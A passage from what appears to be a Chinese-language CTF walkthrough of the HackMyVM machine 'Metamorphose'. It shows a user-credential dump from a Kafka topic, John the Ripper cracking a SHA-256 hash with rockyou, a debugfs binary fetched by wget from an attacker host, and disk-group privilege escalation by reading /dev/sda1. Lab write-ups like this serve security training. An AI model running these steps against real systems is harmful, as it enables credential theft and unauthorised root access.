--list\nlx_test\n\nbin\/kafka-consumer-groups.sh --zookeeper 127.0.0.1:2181 --list\nconsole-consumer-86845\nconsole-consumer-11967\n\n# \u67e5\u770b\u7279\u5b9aconsumer group \u8be6\u60c5\uff0c\u4f7f\u7528--group\u4e0e--describe\u53c2\u6570\n# \u540c\u6837\u6839\u636e\u65b0\/\u65e7\u7248\u672c\u7684consumer\uff0c\u5206\u522b\u6307\u5b9abootstrap-server\u4e0ezookeeper\u53c2\u6570:\nbin\/kafka-consumer-groups.sh --new-consumer --bootstrap-server 127.0.0.1:9292 --group lx_test --describe\nGROUP                          TOPIC                          PARTITION  CURRENT-OFFSET  LOG-END-OFFSET  LAG             OWNER\nlx_test                        lx_test_topic             0          465             465             0               kafka-python-1.3.1_\/127.0.0.1\n\nbin\/kafka-consumer-groups.sh --zookeeper 127.0.0.1:2181 --group console-consumer-11967 --describe\nGROUP                          TOPIC                          PARTITION  CURRENT-OFFSET  LOG-END-OFFSET  LAG             OWNER\nCould not fetch offset from zookeeper for group console-consumer-11967 partition [lx_test_topic,0] due to missing offset data in zookeeper.\nconsole-consumer-11967         lx_test_topic             0          unknown         465             unknown         console-consumer-11967_aws-lx-1513787888172-d3a91f05-0<\/code><\/pre>\n<p>\u5c1d\u8bd5\u6309\u7167<a href=\"https:\/\/home.cnblogs.com\/u\/AcAc-t\/\">\u53ca\u65f6<\/a>\u5e08\u5085\u7684\u5199\u6cd5\u8fdb\u884c\u64cd\u4f5c\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) melbourne@metamorphose.hmv:\/opt\/kafka\/bin$ .\/kafka-topics.sh --bootstrap-server 127.0.0.1:9092 --list\n__consumer_offsets\ninternal_logs\nuser_feedback\nusers.properties<\/code><\/pre>\n<p>\u83b7\u53d6\u5230\u4e86topic\u4fe1\u606f\uff0c\u8fdb\u4e00\u6b65\u8fdb\u884c\u63d0\u53d6\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) melbourne@metamorphose.hmv:\/opt\/kafka\/bin$ .\/kafka-console-consumer.sh --topic users.properties --bootstrap-server localhost:9092 --from-beginning --property print.key=true --property key.separator=&quot;-&quot;\nnull-{&quot;username&quot;: &quot;root&quot;, &quot;password&quot;: &quot;e2f7a3617512ed81aa68c7be9c435609cfb513b021ce07ee9d2759f08f4d9054&quot;, &quot;email&quot;: &quot;root@metamorphose.hmv&quot;, &quot;role&quot;: &quot;admin&quot;}\nnull-{&quot;username&quot;: &quot;saman&quot;, &quot;password&quot;: &quot;5b5ba511537a7871212f7a978f708aef60a02b80e77ed14dcc59cbd019d6791d&quot;, &quot;email&quot;: &quot;saman@metamorphose.hmv&quot;, &quot;role&quot;: &quot;editor&quot;}\nnull-{&quot;username&quot;: &quot;michele&quot;, &quot;password&quot;: &quot;77e19ed98cf4b945e9034efb30779abd21c70a7b4e3b0ae92ab50db9ca39a75b&quot;, &quot;email&quot;: &quot;michele@metamorphose.hmv&quot;, &quot;role&quot;: &quot;viewer&quot;}\nnull-{&quot;username&quot;: &quot;oleesa&quot;, &quot;password&quot;: &quot;f44609c0c1fe331267c8fe1069f4b67fd67ff95fb9742eede4ec9028fa770bdd&quot;, &quot;email&quot;: &quot;oleesa@metamorphose.hmv&quot;, &quot;role&quot;: &quot;admin&quot;}\nnull-{&quot;username&quot;: &quot;sarene&quot;, &quot;password&quot;: &quot;2f15dacafe7b70bfa88d07d15026cdd40799264c36c120e34a28e7659b6a928d&quot;, &quot;email&quot;: &quot;sarene@metamorphose.hmv&quot;, &quot;role&quot;: &quot;viewer&quot;}\nnull-{&quot;username&quot;: &quot;janella&quot;, &quot;password&quot;: &quot;bc5219396bb2a0de2e0776ad1078f67c417da95d5e009989d7d4ea14823bfb5a&quot;, &quot;email&quot;: &quot;janella@metamorphose.hmv&quot;, &quot;role&quot;: &quot;viewer&quot;}\nnull-{&quot;username&quot;: &quot;bronson&quot;, &quot;password&quot;: &quot;a0ef680b09d2f9821d69416d6c5629d3f109751c0fc3a77592041644e268a65e&quot;, &quot;email&quot;: &quot;bronson@metamorphose.hmv&quot;, &quot;role&quot;: &quot;admin&quot;}\nnull-{&quot;username&quot;: &quot;vonda&quot;, &quot;password&quot;: &quot;b1d83b7991c7a2286abfc2ba555e426a4dd7db4072815f71e3ec45406ab8dd7d&quot;, &quot;email&quot;: &quot;vonda@metamorphose.hmv&quot;, &quot;role&quot;: &quot;viewer&quot;}\nnull-{&quot;username&quot;: &quot;toshinari&quot;, &quot;password&quot;: &quot;5018f7be54a3f684bb01b2d21e293a423f5978da36e19c86abc085d9514b56d2&quot;, &quot;email&quot;: &quot;toshinari@metamorphose.hmv&quot;, &quot;role&quot;: &quot;editor&quot;}\nnull-{&quot;username&quot;: &quot;laurie&quot;, &quot;password&quot;: &quot;597f3fdd0ba9d4af8699dc30e4d1c8c74551e10a56eaad108d34b28ac8d353c7&quot;, &quot;email&quot;: &quot;laurie@metamorphose.hmv&quot;, &quot;role&quot;: &quot;user&quot;}\nnull-{&quot;username&quot;: &quot;alia&quot;, &quot;password&quot;: &quot;d2e5eda5bf734608f1585adffc30846340878e0ab1f0be572ac79f88ac4c808e&quot;, &quot;email&quot;: &quot;alia@metamorphose.hmv&quot;, &quot;role&quot;: &quot;admin&quot;}\nnull-{&quot;username&quot;: &quot;raj&quot;, &quot;password&quot;: &quot;3a76752b3c949f0bdaed819d0f61ae6ca863e5235062a004b23e65059cae6fdd&quot;, &quot;email&quot;: &quot;raj@metamorphose.hmv&quot;, &quot;role&quot;: &quot;editor&quot;}\nnull-{&quot;username&quot;: &quot;arleen&quot;, &quot;password&quot;: &quot;aaf6946a8e02f31cc9542a0bb1cfa6dd49ccd01d57802417a28cf493ad7ff5ad&quot;, &quot;email&quot;: &quot;arleen@metamorphose.hmv&quot;, &quot;role&quot;: &quot;editor&quot;}\nnull-{&quot;username&quot;: &quot;melbourne&quot;, &quot;password&quot;: &quot;a08aa555a5e5b7a73125cf367176ce446eb1d0c07a068077ab4f740a8fded545&quot;, &quot;email&quot;: &quot;melbourne@metamorphose.hmv&quot;, &quot;role&quot;: &quot;admin&quot;}\nnull-{&quot;username&quot;: &quot;carolyn&quot;, &quot;password&quot;: &quot;544c4de6388bf397d905015b085ee359f3813550912467bed347e666d35a1fee&quot;, &quot;email&quot;: &quot;carolyn@metamorphose.hmv&quot;, &quot;role&quot;: &quot;viewer&quot;}\nnull-{&quot;username&quot;: &quot;coralie&quot;, &quot;password&quot;: &quot;9bf4bc753cfb7e1abafb74ec6e3e22e7d47622d2f39a2652b405d34fd50f023e&quot;, &quot;email&quot;: &quot;coralie@metamorphose.hmv&quot;, &quot;role&quot;: &quot;admin&quot;}\nnull-{&quot;username&quot;: &quot;farhad&quot;, &quot;password&quot;: &quot;157e2743e9edc74a954fc6cfa82f77801b66781091955cf0284f0e3819d51dfc&quot;, &quot;email&quot;: &quot;farhad@metamorphose.hmv&quot;, &quot;role&quot;: &quot;editor&quot;}\nnull-{&quot;username&quot;: &quot;felix&quot;, &quot;password&quot;: &quot;3fe0e7fbd33d9ca82f77d1a0c2ff4c28b0d35b8024c61a05bd244ccc28d53816&quot;, &quot;email&quot;: &quot;felix@metamorphose.hmv&quot;, &quot;role&quot;: &quot;admin&quot;}\nnull-{&quot;username&quot;: &quot;chase&quot;, &quot;password&quot;: &quot;e387178e3c60967aadc8e8a795a819d24493c05e2d999e56bf01d08654ef80d2&quot;, &quot;email&quot;: &quot;chase@metamorphose.hmv&quot;, &quot;role&quot;: &quot;editor&quot;}\nnull-{&quot;username&quot;: &quot;blakeley&quot;, &quot;password&quot;: &quot;7cd774b3d7a0d7e8696b0cab072c0cc50dd7ab2ac3db362ebe2cd154a3505b78&quot;, &quot;email&quot;: &quot;blakeley@metamorphose.hmv&quot;, &quot;role&quot;: &quot;admin&quot;}\nnull-{&quot;username&quot;: &quot;risa&quot;, &quot;password&quot;: &quot;9dee3c618985708c50c53854751297a10abc8b02e9f416137816fc408145a6b3&quot;, &quot;email&quot;: &quot;risa@metamorphose.hmv&quot;, &quot;role&quot;: &quot;editor&quot;}\nnull-{&quot;username&quot;: &quot;paddy&quot;, &quot;password&quot;: &quot;d24214a379e0a1115185de1415c0c38f9a90803f1188fb366506eb96b219b838&quot;, &quot;email&quot;: &quot;paddy@metamorphose.hmv&quot;, &quot;role&quot;: &quot;editor&quot;}\nnull-{&quot;username&quot;: &quot;min&quot;, &quot;password&quot;: &quot;c84ef95012d8f8baa4d62b1ea791c158a5daa7f82f611b2b33d344cb14779ceb&quot;, &quot;email&quot;: &quot;min@metamorphose.hmv&quot;, &quot;role&quot;: &quot;viewer&quot;}\nnull-{&quot;username&quot;: &quot;ezmeralda&quot;, &quot;password&quot;: &quot;362d8c0d990e1f8583047fbb0114691e2716a0f11d751ce29604611a7e38275d&quot;, &quot;email&quot;: &quot;ezmeralda@metamorphose.hmv&quot;, &quot;role&quot;: &quot;editor&quot;}\nnull-{&quot;username&quot;: &quot;lita&quot;, &quot;password&quot;: &quot;dd3e6e2665d0f27ecce3a7e017c4d7656ad8e5a78d9d40d21bc044cf96097d66&quot;, &quot;email&quot;: &quot;lita@metamorphose.hmv&quot;, &quot;role&quot;: &quot;viewer&quot;}\nnull-{&quot;username&quot;: &quot;angeline&quot;, &quot;password&quot;: &quot;b460021a7bb42c159a2382a9b1f73944b292bf9748f3a063c5e6a2b73db7ba53&quot;, &quot;email&quot;: &quot;angeline@metamorphose.hmv&quot;, &quot;role&quot;: &quot;user&quot;}\nnull-{&quot;username&quot;: &quot;sheridan&quot;, &quot;password&quot;: &quot;8717128e8774950dc2e58f899bbab4a4ba91fe34ac564d00ec4006169fa0fcc5&quot;, &quot;email&quot;: &quot;sheridan@metamorphose.hmv&quot;, &quot;role&quot;: &quot;admin&quot;}\nnull-{&quot;username&quot;: &quot;reid&quot;, &quot;password&quot;: &quot;a0d1968ca7d8580f53b3b65775a7e126e1d4f6054d396f47ede1e65893d653b3&quot;, &quot;email&quot;: &quot;reid@metamorphose.hmv&quot;, &quot;role&quot;: &quot;editor&quot;}\nnull-{&quot;username&quot;: &quot;asher&quot;, &quot;password&quot;: &quot;1f8642763371ca486ff7a5df412fa8c98abac2371032f35835d15dbdf80cab70&quot;, &quot;email&quot;: &quot;asher@metamorphose.hmv&quot;, &quot;role&quot;: &quot;editor&quot;}\nnull-{&quot;username&quot;: &quot;lakyn&quot;, &quot;password&quot;: &quot;2ac9ee0d8724e344fd8b53b13183e8d66a6ba492b8f52960ef90ddb3c369128a&quot;, &quot;email&quot;: &quot;lakyn@metamorphose.hmv&quot;, &quot;role&quot;: &quot;user&quot;}\nnull-{&quot;username&quot;: &quot;aviva&quot;, &quot;password&quot;: &quot;9daa3d43959547cb632bd9234454ac4a655b1b56d2bcee35d72e9121c0e82768&quot;, &quot;email&quot;: &quot;aviva@metamorphose.hmv&quot;, &quot;role&quot;: &quot;user&quot;}\nnull-{&quot;username&quot;: &quot;chabane&quot;, &quot;password&quot;: &quot;966c4d1242e3c0003d6941ef1a202998ec3b48370728e40505096bfb54039e55&quot;, &quot;email&quot;: &quot;chabane@metamorphose.hmv&quot;, &quot;role&quot;: &quot;admin&quot;}\n^CProcessed a total of 32 messages<\/code><\/pre>\n<p>\u5c1d\u8bd5\u63d0\u53d6\u4e00\u4e0b\u76f8\u5173\u4fe1\u606f\uff0c\u7136\u540e\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ cat text | awk -F &#039;[&quot;]&#039; &#039;{print $4}&#039; &gt; user                                       \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ cat text | awk -F &#039;[&quot;]&#039; &#039;{print $8}&#039; &gt; pass\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ paste user pass                                 \nroot    e2f7a3617512ed81aa68c7be9c435609cfb513b021ce07ee9d2759f08f4d9054\nsaman   5b5ba511537a7871212f7a978f708aef60a02b80e77ed14dcc59cbd019d6791d\nmichele 77e19ed98cf4b945e9034efb30779abd21c70a7b4e3b0ae92ab50db9ca39a75b\noleesa  f44609c0c1fe331267c8fe1069f4b67fd67ff95fb9742eede4ec9028fa770bdd\nsarene  2f15dacafe7b70bfa88d07d15026cdd40799264c36c120e34a28e7659b6a928d\njanella bc5219396bb2a0de2e0776ad1078f67c417da95d5e009989d7d4ea14823bfb5a\nbronson a0ef680b09d2f9821d69416d6c5629d3f109751c0fc3a77592041644e268a65e\nvonda   b1d83b7991c7a2286abfc2ba555e426a4dd7db4072815f71e3ec45406ab8dd7d\ntoshinari       5018f7be54a3f684bb01b2d21e293a423f5978da36e19c86abc085d9514b56d2\nlaurie  597f3fdd0ba9d4af8699dc30e4d1c8c74551e10a56eaad108d34b28ac8d353c7\nalia    d2e5eda5bf734608f1585adffc30846340878e0ab1f0be572ac79f88ac4c808e\nraj     3a76752b3c949f0bdaed819d0f61ae6ca863e5235062a004b23e65059cae6fdd\narleen  aaf6946a8e02f31cc9542a0bb1cfa6dd49ccd01d57802417a28cf493ad7ff5ad\nmelbourne       a08aa555a5e5b7a73125cf367176ce446eb1d0c07a068077ab4f740a8fded545\ncarolyn 544c4de6388bf397d905015b085ee359f3813550912467bed347e666d35a1fee\ncoralie 9bf4bc753cfb7e1abafb74ec6e3e22e7d47622d2f39a2652b405d34fd50f023e\nfarhad  157e2743e9edc74a954fc6cfa82f77801b66781091955cf0284f0e3819d51dfc\nfelix   3fe0e7fbd33d9ca82f77d1a0c2ff4c28b0d35b8024c61a05bd244ccc28d53816\nchase   e387178e3c60967aadc8e8a795a819d24493c05e2d999e56bf01d08654ef80d2\nblakeley        7cd774b3d7a0d7e8696b0cab072c0cc50dd7ab2ac3db362ebe2cd154a3505b78\nrisa    9dee3c618985708c50c53854751297a10abc8b02e9f416137816fc408145a6b3\npaddy   d24214a379e0a1115185de1415c0c38f9a90803f1188fb366506eb96b219b838\nmin     c84ef95012d8f8baa4d62b1ea791c158a5daa7f82f611b2b33d344cb14779ceb\nezmeralda       362d8c0d990e1f8583047fbb0114691e2716a0f11d751ce29604611a7e38275d\nlita    dd3e6e2665d0f27ecce3a7e017c4d7656ad8e5a78d9d40d21bc044cf96097d66\nangeline        b460021a7bb42c159a2382a9b1f73944b292bf9748f3a063c5e6a2b73db7ba53\nsheridan        8717128e8774950dc2e58f899bbab4a4ba91fe34ac564d00ec4006169fa0fcc5\nreid    a0d1968ca7d8580f53b3b65775a7e126e1d4f6054d396f47ede1e65893d653b3\nasher   1f8642763371ca486ff7a5df412fa8c98abac2371032f35835d15dbdf80cab70\nlakyn   2ac9ee0d8724e344fd8b53b13183e8d66a6ba492b8f52960ef90ddb3c369128a\naviva   9daa3d43959547cb632bd9234454ac4a655b1b56d2bcee35d72e9121c0e82768\nchabane 966c4d1242e3c0003d6941ef1a202998ec3b48370728e40505096bfb54039e5<\/code><\/pre>\n<p>\u7206\u7834\u4e00\u4e0b\uff0c\u7b49\u4e00\u4e0b\uff0c\u5148\u770b\u4e00\u4e0b\u6709\u54ea\u4e9b\u7528\u6237\u662f\u5728\u7535\u8111\u4e0a\u7684\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) melbourne@metamorphose.hmv:\/home$ ls -la\ntotal 276\ndrwxr-xr-x  4 root      root        4096 Feb 26 17:14 .\ndrwxr-xr-x 18 root      root      266240 May 28 11:22 ..\ndrwx------  2 coralie   coralie     4096 Feb 26 17:32 coralie\ndrwx------  3 melbourne melbourne   4096 Feb 26 17:32 melbourne\n(remote) melbourne@metamorphose.hmv:\/home$ cat \/etc\/passwd | grep \/bin\nroot:x:0:0:root:\/root:\/bin\/bash\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nmelbourne:x:1000:1000:,,,:\/home\/melbourne:\/bin\/bash\ncoralie:x:1001:1001::\/home\/coralie:\/bin\/bash<\/code><\/pre>\n<p>\u627e\u4e00\u4e0b\u8fd9\u4e2a<code>coralie<\/code>\u7528\u6237\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ paste user pass | grep coralie\ncoralie 9bf4bc753cfb7e1abafb74ec6e3e22e7d47622d2f39a2652b405d34fd50f023e\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ john --wordlist=\/usr\/share\/wordlists\/rockyou.txt hash\nWarning: detected hash type &quot;cryptoSafe&quot;, but the string is also recognized as &quot;gost&quot;\nUse the &quot;--format=gost&quot; option to force loading these as that type instead\nWarning: detected hash type &quot;cryptoSafe&quot;, but the string is also recognized as &quot;HAVAL-256-3&quot;\nUse the &quot;--format=HAVAL-256-3&quot; option to force loading these as that type instead\nWarning: detected hash type &quot;cryptoSafe&quot;, but the string is also recognized as &quot;Panama&quot;\nUse the &quot;--format=Panama&quot; option to force loading these as that type instead\nWarning: detected hash type &quot;cryptoSafe&quot;, but the string is also recognized as &quot;po&quot;\nUse the &quot;--format=po&quot; option to force loading these as that type instead\nWarning: detected hash type &quot;cryptoSafe&quot;, but the string is also recognized as &quot;Raw-Keccak-256&quot;\nUse the &quot;--format=Raw-Keccak-256&quot; option to force loading these as that type instead\nWarning: detected hash type &quot;cryptoSafe&quot;, but the string is also recognized as &quot;Raw-SHA256&quot;\nUse the &quot;--format=Raw-SHA256&quot; option to force loading these as that type instead\nWarning: detected hash type &quot;cryptoSafe&quot;, but the string is also recognized as &quot;skein-256&quot;\nUse the &quot;--format=skein-256&quot; option to force loading these as that type instead\nWarning: detected hash type &quot;cryptoSafe&quot;, but the string is also recognized as &quot;Snefru-256&quot;\nUse the &quot;--format=Snefru-256&quot; option to force loading these as that type instead\nUsing default input encoding: UTF-8\nLoaded 1 password hash (cryptoSafe [AES-256-CBC])\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\n0g 0:00:00:05 DONE (2024-08-05 12:17) 0g\/s 2476Kp\/s 2476Kc\/s 2476KC\/s 02102265315..*7\u00a1Vamos!\nSession completed. \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ cat hash                                   \n9bf4bc753cfb7e1abafb74ec6e3e22e7d47622d2f39a2652b405d34fd50f023e\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ hash-identifier                                                    \n   #########################################################################\n   #     __  __                     __           ______    _____           #\n   #    \/\\ \\\/\\ \\                   \/\\ \\         \/\\__  _\\  \/\\  _ `\\         #\n   #    \\ \\ \\_\\ \\     __      ____ \\ \\ \\___     \\\/_\/\\ \\\/  \\ \\ \\\/\\ \\        #\n   #     \\ \\  _  \\  \/&#039;__`\\   \/ ,__\\ \\ \\  _ `\\      \\ \\ \\   \\ \\ \\ \\ \\       #\n   #      \\ \\ \\ \\ \\\/\\ \\_\\ \\_\/\\__, `\\ \\ \\ \\ \\ \\      \\_\\ \\__ \\ \\ \\_\\ \\      #\n   #       \\ \\_\\ \\_\\ \\___ \\_\\\/\\____\/  \\ \\_\\ \\_\\     \/\\_____\\ \\ \\____\/      #\n   #        \\\/_\/\\\/_\/\\\/__\/\\\/_\/\\\/___\/    \\\/_\/\\\/_\/     \\\/_____\/  \\\/___\/  v1.2 #\n   #                                                             By Zion3R #\n   #                                                    www.Blackploit.com #\n   #                                                   Root@Blackploit.com #\n   #########################################################################\n--------------------------------------------------\n HASH: 9bf4bc753cfb7e1abafb74ec6e3e22e7d47622d2f39a2652b405d34fd50f023e\n\nPossible Hashs:\n[+] SHA-256\n[+] Haval-256\n\nLeast Possible Hashs:\n[+] GOST R 34.11-94\n[+] RipeMD-256\n[+] SNEFRU-256\n[+] SHA-256(HMAC)\n[+] Haval-256(HMAC)\n[+] RipeMD-256(HMAC)\n[+] SNEFRU-256(HMAC)\n[+] SHA-256(md5($pass))\n[+] SHA-256(sha1($pass))\n--------------------------------------------------\n HASH: ^C\n\n        Bye!\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ john --list=formats | grep &quot;SHA-256&quot;\n414 formats (149 dynamic formats shown as just &quot;dynamic_n&quot; here)\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ john --list=formats | grep &quot;256&quot;    \n414 formats (149 dynamic formats shown as just &quot;dynamic_n&quot; here)\ntripcode, AndroidBackup, adxcrypt, agilekeychain, aix-ssha1, aix-ssha256, \nsha256crypt, sha512crypt, Citrix_NS10, dahua, dashlane, diskcryptor, Django, \nelectrum, EncFS, enpass, EPI, EPiServer, ethereum, fde, Fortigate256, \nFortigate, FormSpring, FVDE, geli, gost, gpg, HAVAL-128-4, HAVAL-256-3, hdaa, \nPBKDF2-HMAC-SHA256, PBKDF2-HMAC-SHA512, PDF, PEM, pfx, pgpdisk, pgpsda, \nRaw-Blake2, Raw-Keccak, Raw-Keccak-256, Raw-MD4, Raw-MD5, Raw-MD5u, Raw-SHA1, \nRaw-SHA1-AxCrypt, Raw-SHA1-Linkedin, Raw-SHA224, Raw-SHA256, Raw-SHA3, \nskein-256, skein-512, skey, SL3, Snefru-128, Snefru-256, LastPass, SNMP, \nHMAC-SHA256, HMAC-SHA384, HMAC-SHA512, dummy, crypt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ john --wordlist=\/usr\/share\/wordlists\/rockyou.txt hash --format=Raw-SHA256 \nUsing default input encoding: UTF-8\nLoaded 1 password hash (Raw-SHA256 [SHA256 128\/128 SSE2 4x])\nWarning: poor OpenMP scalability for this hash type, consider --fork=2\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nmy2monkeys       (?)     \n1g 0:00:00:00 DONE (2024-08-05 12:23) 7.142g\/s 2925Kp\/s 2925Kc\/s 2925KC\/s remmer..kevin56\nUse the &quot;--show --format=Raw-SHA256&quot; options to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n<h3>\u63d0\u53d6\u78c1\u76d8\u4fe1\u606f<\/h3>\n<p>\u5148\u8fdb\u884c\u5207\u6362\u7528\u6237\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058528.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058528.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240806002423533\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">coralie@metamorphose:~$ sudo -l\nbash: sudo: command not found\ncoralie@metamorphose:~$ whoami;id\ncoralie\nuid=1001(coralie) gid=1001(coralie) groups=1001(coralie),6(disk)\ncoralie@metamorphose:~$ df -h\nFilesystem      Size  Used Avail Use% Mounted on\nudev            962M     0  962M   0% \/dev\ntmpfs           197M  548K  197M   1% \/run\n\/dev\/sda1        29G  4.4G   23G  16% \/\ntmpfs           984M     0  984M   0% \/dev\/shm\ntmpfs           5.0M     0  5.0M   0% \/run\/lock\ntmpfs           197M     0  197M   0% \/run\/user\/1001<\/code><\/pre>\n<p>\u53d1\u73b0\u6302\u8f7d\u4e86\u4e00\u4e2a\u78c1\u76d8\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\uff0c\u4f7f\u7528<code>debugfs<\/code>\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ find \/ -name *debugfs* 2&gt;\/dev\/null\n\/usr\/share\/man\/man8\/debugfs.8.gz\n\/usr\/lib\/modules\/6.6.9-amd64\/kernel\/net\/l2tp\/l2tp_debugfs.ko.xz\n\/usr\/lib\/modules\/6.6.9-amd64\/kernel\/drivers\/platform\/chrome\/cros_ec_debugfs.ko.xz\n\/usr\/lib\/modules\/6.6.9-amd64\/kernel\/drivers\/platform\/chrome\/wilco_ec\/wilco_ec_debugfs.ko.xz\n\/usr\/sbin\/debugfs\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ file \/usr\/sbin\/debugfs            \n\/usr\/sbin\/debugfs: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=24c03a9f2307079cfd9615f13399d74388a2a0db, for GNU\/Linux 3.2.0, stripped\n\ncoralie@metamorphose:\/tmp$ wget http:\/\/172.20.10.8:8888\/debugfs\n--2024-08-05 18:45:40--  http:\/\/172.20.10.8:8888\/debugfs\nConnecting to 172.20.10.8:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 243536 (238K) [application\/octet-stream]\nSaving to: \u2018debugfs\u2019\n\ndebugfs                                         100%[====================================================================================================&gt;] 237.83K  --.-KB\/s    in 0.004s  \n\n2024-08-05 18:45:40 (56.3 MB\/s) - \u2018debugfs\u2019 saved [243536\/243536]\n\ncoralie@metamorphose:\/tmp$ chmod +x debugfs \ncoralie@metamorphose:\/tmp$ df -h\nFilesystem      Size  Used Avail Use% Mounted on\nudev            962M     0  962M   0% \/dev\ntmpfs           197M  548K  197M   1% \/run\n\/dev\/sda1        29G  4.4G   23G  16% \/\ntmpfs           984M     0  984M   0% \/dev\/shm\ntmpfs           5.0M     0  5.0M   0% \/run\/lock\ntmpfs           197M     0  197M   0% \/run\/user\/1001\ncoralie@metamorphose:\/tmp$ .\/debugfs \/dev\/sda1\ndebugfs 1.47.0 (5-Feb-2023)\ndebugfs:  help\nAvailable debugfs requests:\n\nshow_debugfs_params, params\n                         Show debugfs parameters\nopen_filesys, open       Open a filesystem\nclose_filesys, close     Close the filesystem\nfreefrag, e2freefrag     Report free space fragmentation\nfeature, features        Set\/print superblock features\ndirty_filesys, dirty     Mark the filesystem as dirty\ninit_filesys             Initialize a filesystem (DESTROYS DATA)\nshow_super_stats, stats  Show superblock statistics\nncheck                   Do inode-&gt;name translation\nicheck                   Do block-&gt;inode translation\nchange_root_directory, chroot\n                         Change root directory\nchange_working_directory, cd\n                         Change working directory\nlist_directory, ls       List directory\nshow_inode_info, stat    Show inode information \ndump_extents, extents, ex\n                         Dump extents information \nblocks                   Dump blocks used by an inode \nfilefrag                 Report fragmentation information for an inode\nlink, ln                 Create directory link\nunlink                   Delete a directory link\nmkdir                    Create a directory\nrmdir                    Remove a directory\nrm                       Remove a file (unlink and kill_file, if appropriate)\nkill_file                Deallocate an inode and its blocks\ncopy_inode               Copy the inode structure\nclri                     Clear an inode&#039;s contents\nfreei                    Clear an inode&#039;s in-use flag\nseti                     Set an inode&#039;s in-use flag\ntesti                    Test an inode&#039;s in-use flag\nfreeb                    Clear a block&#039;s in-use flag\nsetb                     Set a block&#039;s in-use flag\ntestb                    Test a block&#039;s in-use flag\nmodify_inode, mi         Modify an inode by structure\nfind_free_block, ffb     Find free block(s)\nfind_free_inode, ffi     Find free inode(s)\nprint_working_directory, pwd\n                         Print current working directory\nexpand_dir, expand       Expand directory\nmknod                    Create a special file\nlist_deleted_inodes, lsdel\n                         List deleted inodes\nundelete, undel          Undelete file\nwrite                    Copy a file from your native filesystem\ndump_inode, dump         Dump an inode out to a file\ncat                      Dump an inode out to stdout\nlcd                      Change the current directory on your native filesystem\nrdump                    Recursively dump a directory to the native filesystem\nset_super_value, ssv     Set superblock value\nset_inode_field, sif     Set inode field\nset_block_group, set_bg  Set block group descriptor field\nlogdump                  Dump the contents of the journal\nhtree_dump, htree        Dump a hash-indexed directory\ndx_hash, hash            Calculate the directory hash of a filename\ndirsearch                Search a directory for a particular filename\nbmap                     Calculate the logical-&gt;physical block mapping for an inode\nfallocate                Allocate uninitialized blocks to an inode\npunch, truncate          Punch (or truncate) blocks from an inode by deallocating them\nsymlink                  Create a symbolic link\nimap                     Calculate the location of an inode\ndump_unused              Dump unused blocks\nset_current_time         Set current time to use when setting filesystem fields\nsupported_features       Print features supported by this version of e2fsprogs\ndump_mmp                 Dump MMP information\nset_mmp_value, smmp      Set MMP value\nextent_open, eo          Open inode for extent manipulation\nzap_block, zap           Zap block: fill with 0, pattern, flip bits etc.\nblock_dump, bdump, bd    Dump contents of a block\nea_list                  List extended attributes of an inode\nea_get                   Get an extended attribute of an inode\nea_set                   Set an extended attribute of an inode\nea_rm                    Remove an extended attribute of an inode\nlist_quota, lq           List quota\nget_quota, gq            Get quota\ninode_dump, idump, id    Dump 